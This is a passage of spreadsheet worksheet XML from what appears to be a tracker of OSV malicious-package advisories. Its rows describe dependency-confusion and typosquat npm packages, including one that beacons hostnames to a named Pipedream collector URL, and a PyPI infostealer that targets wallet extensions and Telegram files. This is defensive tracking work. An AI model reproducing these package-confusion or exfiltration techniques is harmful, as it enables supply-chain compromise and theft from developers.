package.json for @airbnb-extended/typescript-config@99.9.1 declares a dependency `ltidisafe` sourced from a bare HTTPS tarball URL (https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.7.8.tgz) instead of a registry version range. On `npm install`, npm fetches and installs whatever bytes that URL returns, executing any lifecycle scripts inside the fetched tarball. The source is unpinned by integrity hash, is not the npm registry, and is unrelated to any Airbnb-published infrastructure. The scope/name also mimics the well-known `@airbnb/typescript-config` package, and the version `99.9.1` is implausibly high — a dependency-confusion / lure shape designed to win resolution against a legitimate internal or public package. The tarball URL is mutable by whoever controls the storage bucket, so the delivered payload can change at any time.
</t>
        </is>
      </c>
      <c r="T780" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17184</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17185</t>
        </is>
      </c>
      <c r="D781" s="5" t="inlineStr"/>
      <c r="E781" s="5" t="inlineStr"/>
      <c r="F781" s="5" t="inlineStr"/>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="inlineStr"/>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K781" s="5" t="inlineStr"/>
      <c r="L781" s="5" t="inlineStr">
        <is>
          <t>npm:shoplist-app</t>
        </is>
      </c>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q781" s="5" t="inlineStr"/>
      <c r="R781" s="5" t="inlineStr"/>
      <c r="S781" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fdceadb01f08162934382b121e813236b86adc0d4d74b7b2f062c78e529c34f6)
shoplist-app@99.99.99 is a dependency-confusion / typosquat beacon. preinstall.js is wired into every lifecycle hook (preinstall, install, postinstall, prepare, prepublish) and issues an HTTPS GET to the hardcoded endpoint https://eo8f3m3ho26a0nm.m.pipedream.net/, transmitting the installer's machine hostname via os.hostname() (smuggled into a `host` HTTP header) together with package identity in the query string. index.js — the package `main` — independently fires a second HTTPS GET to the same Pipedream collector at require/import time, carrying os.platform() and a `trigger=runtime` marker. The package ships no functional code beyond these beacons; its version (99.99.99) and description ("test") are consistent with a name-squat probe designed to identify which internal build hosts resolve the name shoplist-app. The exfiltrated data (hostname, OS platform, package-name confirmation) gives the operator of the Pipedream endpoint a map of environments where a shoplist-app dependency reference successfully resolves to this public package — the standard reconnaissance stage of a dependency-confusion attack.
</t>
        </is>
      </c>
      <c r="T781" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17185</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17187</t>
        </is>
      </c>
      <c r="D782" s="5" t="inlineStr"/>
      <c r="E782" s="5" t="inlineStr"/>
      <c r="F782" s="5" t="inlineStr"/>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K782" s="5" t="inlineStr"/>
      <c r="L782" s="5" t="inlineStr">
        <is>
          <t>npm:@digift/cli</t>
        </is>
      </c>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q782" s="5" t="inlineStr"/>
      <c r="R782" s="5" t="inlineStr"/>
      <c r="S782" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ossf-package-analysis (5508ba462afd4a4d6f311cca1a00d728ea27b8fe03a2fba93878a9fabbb7f309)
The OpenSSF Package Analysis project identified '@digift/cli' @ 99.99.100 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="T782" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17187</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17188</t>
        </is>
      </c>
      <c r="D783" s="5" t="inlineStr"/>
      <c r="E783" s="5" t="inlineStr"/>
      <c r="F783" s="5" t="inlineStr"/>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K783" s="5" t="inlineStr"/>
      <c r="L783" s="5" t="inlineStr">
        <is>
          <t>PyPI:sherpy</t>
        </is>
      </c>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q783" s="5" t="inlineStr"/>
      <c r="R783" s="5" t="inlineStr"/>
      <c r="S783" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (2e5440f1e24545fd14e73c7fc459a9abf893f4674683899ed29ff7c4189416b6)
When used, the package exfiltrates Chrome extension files (likely targeting cryptocurrency wallets) and sensitive Telegram files.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-sherpy
Reasons (based on the campaign):
 - infostealer
 - exfiltration-crypto
 - target:telegram
 - native-extension
</t>
        </is>
      </c>
      <c r="T783" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17188</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T783"/>
  <conditionalFormatting sqref="E2:E78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783">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T560" r:id="rId559"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T561" r:id="rId560"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T562" r:id="rId561"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T563" r:id="rId562"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T564" r:id="rId563"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T565" r:id="rId564"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T566" r:id="rId565"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T567" r:id="rId566"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T568" r:id="rId567"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T569" r:id="rId568"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T570" r:id="rId569"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T571" r:id="rId570"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T572" r:id="rId571"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T573" r:id="rId572"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T574" r:id="rId573"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T575" r:id="rId574"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T576" r:id="rId575"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T577" r:id="rId576"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T578" r:id="rId577"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T579" r:id="rId578"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T580" r:id="rId579"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T581" r:id="rId580"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T582" r:id="rId581"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T583" r:id="rId582"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T584" r:id="rId583"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T585" r:id="rId584"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T586" r:id="rId585"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T587" r:id="rId586"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T588" r:id="rId587"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T589" r:id="rId588"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T590" r:id="rId589"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T591" r:id="rId590"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T592" r:id="rId591"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T593" r:id="rId592"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T594" r:id="rId593"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T595" r:id="rId594"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T596" r:id="rId595"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T597" r:id="rId596"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T598" r:id="rId597"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T599" r:id="rId598"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T600" r:id="rId599"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T601" r:id="rId600"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T602" r:id="rId601"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T603" r:id="rId602"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T604" r:id="rId603"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T605" r:id="rId604"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T606" r:id="rId605"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T607" r:id="rId606"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T608" r:id="rId607"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T609" r:id="rId608"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T610" r:id="rId609"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T611" r:id="rId610"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T612" r:id="rId611"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T613" r:id="rId612"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T614" r:id="rId613"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T615" r:id="rId614"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T616" r:id="rId615"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T617" r:id="rId616"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T618" r:id="rId617"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T619" r:id="rId618"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T620" r:id="rId619"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T621" r:id="rId620"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T622" r:id="rId621"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T623" r:id="rId622"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T624" r:id="rId623"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T625" r:id="rId624"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T626" r:id="rId625"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T627" r:id="rId626"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T628" r:id="rId627"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T629" r:id="rId628"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T630" r:id="rId629"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T631" r:id="rId630"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T632" r:id="rId631"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T633" r:id="rId632"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T634" r:id="rId633"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T635" r:id="rId634"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T636" r:id="rId635"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T637" r:id="rId636"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T638" r:id="rId637"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T639" r:id="rId638"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T640" r:id="rId639"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T641" r:id="rId640"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T642" r:id="rId641"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T643" r:id="rId642"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T644" r:id="rId643"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T645" r:id="rId644"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T646" r:id="rId645"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T647" r:id="rId646"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T648" r:id="rId647"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T649" r:id="rId648"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T650" r:id="rId649"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T651" r:id="rId650"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T652" r:id="rId651"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T653" r:id="rId652"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T654" r:id="rId653"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T655" r:id="rId654"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T656" r:id="rId655"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T657" r:id="rId656"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T658" r:id="rId657"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T659" r:id="rId658"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T660" r:id="rId659"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T661" r:id="rId660"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T662" r:id="rId661"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T663" r:id="rId662"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T664" r:id="rId663"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T665" r:id="rId664"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T666" r:id="rId665"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T667" r:id="rId666"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T668" r:id="rId667"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T669" r:id="rId668"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T670" r:id="rId669"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T671" r:id="rId670"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T672" r:id="rId671"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T673" r:id="rId672"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T674" r:id="rId673"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T675" r:id="rId674"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T676" r:id="rId675"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T677" r:id="rId676"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T678" r:id="rId677"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T679" r:id="rId678"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T680" r:id="rId679"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T681" r:id="rId680"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T682" r:id="rId681"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T683" r:id="rId682"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T684" r:id="rId683"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T685" r:id="rId684"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T686" r:id="rId685"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T687" r:id="rId686"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T688" r:id="rId687"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T689" r:id="rId688"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T690" r:id="rId689"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T691" r:id="rId690"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T692" r:id="rId691"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T693" r:id="rId692"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T694" r:id="rId693"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T695" r:id="rId694"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T696" r:id="rId695"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T697" r:id="rId696"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T698" r:id="rId697"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T699" r:id="rId698"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T700" r:id="rId699"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T701" r:id="rId700"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T702" r:id="rId701"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T703" r:id="rId702"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T704" r:id="rId703"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T705" r:id="rId704"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T706" r:id="rId705"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T707" r:id="rId706"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T708" r:id="rId707"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T709" r:id="rId708"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T710" r:id="rId709"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T711" r:id="rId710"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T712" r:id="rId711"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T713" r:id="rId712"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T714" r:id="rId713"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T715" r:id="rId714"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T716" r:id="rId715"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T717" r:id="rId716"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T718" r:id="rId717"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T719" r:id="rId718"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T720" r:id="rId719"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T721" r:id="rId720"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T722" r:id="rId721"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T723" r:id="rId722"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T724" r:id="rId723"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T725" r:id="rId724"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T726" r:id="rId725"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T727" r:id="rId726"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T728" r:id="rId727"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T729" r:id="rId728"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T730" r:id="rId729"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T731" r:id="rId730"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T732" r:id="rId731"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T733" r:id="rId732"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T734" r:id="rId733"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T735" r:id="rId734"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T736" r:id="rId735"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T737" r:id="rId736"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T738" r:id="rId737"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T739" r:id="rId738"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T740" r:id="rId739"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T741" r:id="rId740"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T742" r:id="rId741"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T743" r:id="rId742"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T744" r:id="rId743"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T745" r:id="rId744"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T746" r:id="rId745"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T747" r:id="rId746"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T748" r:id="rId747"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T749" r:id="rId748"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T750" r:id="rId749"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T751" r:id="rId750"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T752" r:id="rId751"/>
